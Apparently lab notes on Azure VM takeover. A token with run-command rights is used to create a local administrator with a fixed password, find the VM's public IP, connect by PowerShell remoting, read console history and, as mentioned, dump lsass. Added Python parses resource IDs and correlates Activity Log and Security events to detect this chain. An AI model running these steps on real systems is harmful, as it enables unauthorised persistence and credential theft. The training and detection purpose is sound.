If you have a token with permission to execute commands on a VM, you can of course get access to the VM.
Run command on VM
Invoke-AzVMRunCommand -VMname bkpadconnect -ResourceGroupName Engineering -CommandId 'RunPowerShellScript' -ScriptPath C:\AzAD\Tools\adduser.ps1 -Verbose
In this case, adduser.ps1 creates a local user on the VM and adds that user to the local Administrators group:
$passwd = ConvertTo-SecureString "StudXPassword@123" -AsPlainText -Force
New-LocalUser -Name student60 -Password $passwd
Add-LocalGroupMember -Group Administrators -Member student60
A VM in Azure is very likely monitored and protected by Azure's security mechanisms, so a reverse shell may get blocked. That is why this approach creates a local account and then connects to the VM directly instead.
Get Public IP of VM
First, get the network interfaces that our token can read:
PS C:\Users\studentuser60> (Get-AzVM -name bkpadconnect -ResourceGroupName Engineering | select -ExpandProperty NetworkProfile).NetworkInterfaces
Primary DeleteOption Id
------- ------------ --
/subscriptions/b413826f-108d-4049-8c11-xxxx/resourceGroups/Engineering/providers/Microsoft.Network/networkInterfaces/bkpadconnect368
The name of the interface is bkpadconnect368. We can now get the details for the interface:
PS C:\Users\studentuser60> Get-AzNetworkInterface -name bkpadconnect368
Name : bkpadconnect368
IpConfigurations : [
{
"Name": "ipconfig1",
"Etag": "W/\"305e619b-30e6-491c-a185-xxxx\"",
"Id": "/subscriptions/b413826f-108d-4049-8c11-xxx/resourceGroups/Engineering/providers/Microsoft.Network/networkInterfaces/bkpadconnect368/ipConfigurations/ipconfig1",
"PrivateIpAddress": "10.0.0.4",
"PrivateIpAllocationMethod": "Dynamic",
"Subnet": {
"Id": "/subscriptions/b413826f-108d-4049-8c11-xxxx/resourceGroups/Engineering/providers/Microsoft.Network/virtualNetworks/Engineering-vnet/subnets/default",
"IpAllocations": []
},
"PublicIpAddress": {
"IpTags": [],
"Zones": [],
"Id": "/subscriptions/b413826f-108d-4049-8c11-xxxxx/resourceGroups/Engineering/providers/Microsoft.Network/publicIPAddresses/bkpadconnectIP"
},
This tells you the name of the publicIPAddress resource: bkpadconnectIP. Using this information, we can get the public IP:
PS C:\Users\studentuser60> Get-AzPublicIpAddress -Name bkpadconnectIP
Name : bkpadconnectIP
ResourceGuid : a6e23b55-d8b1-4e0e-9fda-xxxxx
ProvisioningState : Succeeded
Tags :
PublicIpAllocationMethod : Dynamic
IpAddress : 1.1.1.1
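The notes read the interface name and the public IP resource name out of the Id strings by eye. As an added example (not from the original notes), the Python below parses ARM resource IDs in general, including child resources such as ipConfigurations, and then performs the same VM -> NIC -> public IP walk over a constructed inventory shaped like the Get-AzVM, Get-AzNetworkInterface and Get-AzPublicIpAddress output above, so a defender can list every VM in a resource group that has a public address. The second VM (buildagent01) and its NIC are invented; the subscription GUID is masked as on the page.

```python
"""Parse ARM resource IDs and walk VM -> NIC -> public IP over exported data.

Added example, not from the original notes. The parser handles the resource ID
format itself; the VM, NIC and public IP objects below are constructed dicts
with the same property names as the cmdlet output shown in the notes.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class ArmResourceId:
    subscription_id: str
    resource_group: Optional[str]
    provider: str                 # e.g. "Microsoft.Network"
    types: Tuple[str, ...]        # e.g. ("networkInterfaces", "ipConfigurations")
    names: Tuple[str, ...]        # e.g. ("bkpadconnect368", "ipconfig1")

    @property
    def resource_type(self) -> str:
        return "/".join((self.provider,) + self.types)

    @property
    def name(self) -> str:
        return self.names[-1]

    @property
    def parent(self) -> Optional["ArmResourceId"]:
        # The resource a child (e.g. an ipConfiguration) hangs off; None at top level.
        if len(self.types) == 1:
            return None
        return ArmResourceId(self.subscription_id, self.resource_group,
                             self.provider, self.types[:-1], self.names[:-1])


def parse_resource_id(resource_id: str) -> ArmResourceId:
    """/subscriptions/{sub}/resourceGroups/{rg}/providers/{ns}/{type}/{name}[/{childType}/{childName}...]

    Keyword segments are matched case-insensitively, as ARM itself does.
    """
    parts = [p for p in resource_id.strip().split("/") if p]
    if len(parts) < 2 or parts[0].lower() != "subscriptions":
        raise ValueError(f"not an ARM resource ID: {resource_id!r}")
    sub, i, rg = parts[1], 2, None
    if i + 1 < len(parts) and parts[i].lower() == "resourcegroups":
        rg, i = parts[i + 1], i + 2
    if i + 1 >= len(parts) or parts[i].lower() != "providers":
        raise ValueError(f"no provider segment in {resource_id!r}")
    provider, rest = parts[i + 1], parts[i + 2:]
    if len(rest) < 2 or len(rest) % 2:
        raise ValueError(f"type/name segments must come in pairs: {resource_id!r}")
    if any(p.lower() == "providers" for p in rest):
        raise ValueError("extension resources (nested /providers/) are not handled here")
    return ArmResourceId(sub, rg, provider, tuple(rest[0::2]), tuple(rest[1::2]))


# Constructed inventory: the VM from the notes plus an invented VM with no public IP.
SUB = "/subscriptions/b413826f-108d-4049-8c11-xxxx/resourceGroups/Engineering/providers"
VMS = {
    "bkpadconnect": {"NetworkProfile": {"NetworkInterfaces": [
        {"Id": f"{SUB}/Microsoft.Network/networkInterfaces/bkpadconnect368"}]}},
    "buildagent01": {"NetworkProfile": {"NetworkInterfaces": [
        {"Id": f"{SUB}/Microsoft.Network/networkInterfaces/buildagent01-nic"}]}},
}
NICS = {
    "bkpadconnect368": {"IpConfigurations": [
        {"Name": "ipconfig1", "PrivateIpAddress": "10.0.0.4",
         "PublicIpAddress": {"Id": f"{SUB}/Microsoft.Network/publicIPAddresses/bkpadconnectIP"}}]},
    "buildagent01-nic": {"IpConfigurations": [
        {"Name": "ipconfig1", "PrivateIpAddress": "10.0.0.5", "PublicIpAddress": None}]},
}
PUBLIC_IPS = {"bkpadconnectIP": {"IpAddress": "1.1.1.1", "PublicIpAllocationMethod": "Dynamic"}}


def public_ips_by_vm(vms: Dict, nics: Dict, public_ips: Dict) -> Dict[str, List[str]]:
    """The walk the notes do by hand, for every VM: which ones have an Internet-facing address?"""
    result: Dict[str, List[str]] = {}
    for vm_name, vm in vms.items():
        addrs: List[str] = []
        for nic_ref in vm["NetworkProfile"]["NetworkInterfaces"]:
            nic = nics[parse_resource_id(nic_ref["Id"]).name]
            for ipconf in nic["IpConfigurations"]:
                pip_ref = ipconf.get("PublicIpAddress")
                if pip_ref:
                    # The NIC only carries the public IP's ID; the address lives on the public IP object.
                    addrs.append(public_ips[parse_resource_id(pip_ref["Id"]).name]["IpAddress"])
        result[vm_name] = addrs
    return result


if __name__ == "__main__":
    for vm, addrs in public_ips_by_vm(VMS, NICS, PUBLIC_IPS).items():
        print(f"{vm}: {', '.join(addrs) or 'no public IP'}")
```

Run as a script it prints one line per VM; in practice the three dicts would be filled from exports of the same cmdlets, and a VM with a Dynamic public IP only has an address while it is running.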
Connect to VM
PS C:\Users\studentuser60> $passwd = ConvertTo-SecureString "StudXPassword@123" -AsPlainText -Force
PS C:\Users\studentuser60> $creds = New-Object System.management.automation.pscredential ("student60", $passwd)
PS C:\Users\studentuser60> $sess = New-PSSession 1.1.1.1 -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
PS C:\Users\studentuser60> Enter-PSSession $sess
[1.1.1.1]: PS C:\Users\student60\Documents>
For example, read console history:
cat C:\Users\bkpadconnect\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Or dump lsass etc.
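From the defender's side, every step of this chain leaves a record: the run command is written to the Azure Activity Log as the operation Microsoft.Compute/virtualMachines/runCommand/action, the account creation and group change show up on the VM as Security events 4720 and 4732, and the WinRM session arrives as a type 3 (network) logon, event 4624, from the operator's address. The Python below is an added example, not part of these notes, that correlates the three over constructed and simplified records. Field names follow the Activity Log schema and the Windows Security event data, but the callers, timestamps, SIDs and the 203.0.113.7 source address are invented, and the 30-minute correlation window is an assumption.

```python
"""Correlate Azure Activity Log run-command events with Windows Security events.

Added example, not part of the original notes. All records are constructed and
simplified: Activity Log fields (eventTimestamp, caller, resourceId,
operationName.value, status.value) and Security event data names (TargetUserName,
TargetSid, MemberSid, LogonType, IpAddress) are real, the values are invented.
"""
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network
from typing import Dict, List

RUN_COMMAND_ACTION = "Microsoft.Compute/virtualMachines/runCommand/action"
ADMINISTRATORS_SID = "S-1-5-32-544"      # well-known SID of the local Administrators group
WINDOW = timedelta(minutes=30)           # assumption: how long after the run command we correlate
INTERNAL_NETS = [ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",   # RFC 1918
    "127.0.0.0/8", "169.254.0.0/16",                   # loopback, link-local (incl. Azure IMDS)
    "::1/128", "fe80::/10", "fc00::/7")]


def _ts(value: str) -> datetime:
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def vm_name(resource_id: str) -> str:
    # Last segment of .../providers/Microsoft.Compute/virtualMachines/<name>
    return resource_id.rstrip("/").rsplit("/", 1)[-1]


def is_external(ip: str) -> bool:
    # "-" (interactive/service logons) and unparsable values are not external sources
    try:
        addr = ip_address(ip)
    except ValueError:
        return False
    return not any(addr in net for net in INTERNAL_NETS)


def correlate(activity_log: List[Dict], security_events: Dict[str, List[Dict]]) -> List[Dict]:
    """One finding per successful run command, graded by what followed on the VM."""
    findings = []
    for rec in activity_log:
        if rec["operationName"]["value"] != RUN_COMMAND_ACTION or rec["status"]["value"] != "Succeeded":
            continue
        vm, start = vm_name(rec["resourceId"]), _ts(rec["eventTimestamp"])
        window = [e for e in security_events.get(vm, [])
                  if start <= _ts(e["TimeCreated"]) <= start + WINDOW]
        # 4720: account created. Run Command executes as SYSTEM, so SubjectUserName is the machine account.
        created = {e["TargetSid"]: e["TargetUserName"] for e in window if e["EventID"] == 4720}
        # 4732: one of those new accounts added to BUILTIN\Administrators (matched on SID, not name).
        admins = sorted(created[e["MemberSid"]] for e in window
                        if e["EventID"] == 4732 and e.get("TargetSid") == ADMINISTRATORS_SID
                        and e["MemberSid"] in created)
        # 4624 type 3: network logon (what a WinRM session produces) by a promoted account from outside.
        logons = sorted({e["IpAddress"] for e in window
                         if e["EventID"] == 4624 and e["LogonType"] == "3"
                         and e["TargetUserName"] in admins and is_external(e["IpAddress"])})
        severity = ("info", "medium", "high", "critical")[
            (1 if created else 0) + (1 if admins else 0) + (1 if logons else 0)]
        findings.append({"vm": vm, "caller": rec["caller"], "at": rec["eventTimestamp"],
                         "new_accounts": sorted(created.values()), "new_local_admins": admins,
                         "external_logons": logons, "severity": severity})
    return findings


# Constructed Activity Log: a routine pipeline run command and the one from the notes.
ACTIVITY_LOG = [
    {"eventTimestamp": "2024-03-01T09:00:00Z", "caller": "build-pipeline@example.onmicrosoft.com",
     "resourceId": "/subscriptions/SUB-ID-PLACEHOLDER/resourceGroups/Engineering/providers/Microsoft.Compute/virtualMachines/buildagent01",
     "operationName": {"value": RUN_COMMAND_ACTION}, "status": {"value": "Succeeded"}},
    {"eventTimestamp": "2024-03-01T10:15:00Z", "caller": "studentuser60@example.onmicrosoft.com",
     "resourceId": "/subscriptions/SUB-ID-PLACEHOLDER/resourceGroups/Engineering/providers/Microsoft.Compute/virtualMachines/bkpadconnect",
     "operationName": {"value": RUN_COMMAND_ACTION}, "status": {"value": "Succeeded"}},
]

# Constructed Windows Security events per VM, as a SIEM would hold them.
SECURITY_EVENTS = {
    "buildagent01": [
        {"EventID": 4624, "TimeCreated": "2024-03-01T09:00:05Z", "TargetUserName": "svc_build",
         "LogonType": "5", "IpAddress": "-"},
    ],
    "bkpadconnect": [
        {"EventID": 4720, "TimeCreated": "2024-03-01T10:15:40Z", "SubjectUserName": "BKPADCONNECT$",
         "TargetUserName": "student60", "TargetSid": "S-1-5-21-1111-2222-3333-1005"},
        {"EventID": 4732, "TimeCreated": "2024-03-01T10:15:41Z", "TargetUserName": "Administrators",
         "TargetSid": ADMINISTRATORS_SID, "MemberName": "-", "MemberSid": "S-1-5-21-1111-2222-3333-1005"},
        {"EventID": 4624, "TimeCreated": "2024-03-01T10:32:10Z", "TargetUserName": "student60",
         "LogonType": "3", "IpAddress": "203.0.113.7"},
    ],
}


if __name__ == "__main__":
    for f in correlate(ACTIVITY_LOG, SECURITY_EVENTS):
        print(f["severity"].upper(), f["vm"], f["caller"], f["new_local_admins"], f["external_logons"])
```

Run as a script it prints one line per run command: the pipeline's invocation stays at "info", while the sequence from the notes reaches "critical" because a SYSTEM-created account was promoted to Administrators and then used for a network logon from a non-private address. In a SIEM the two constructed collections would be replaced by the Activity Log export and the VM's forwarded Security events.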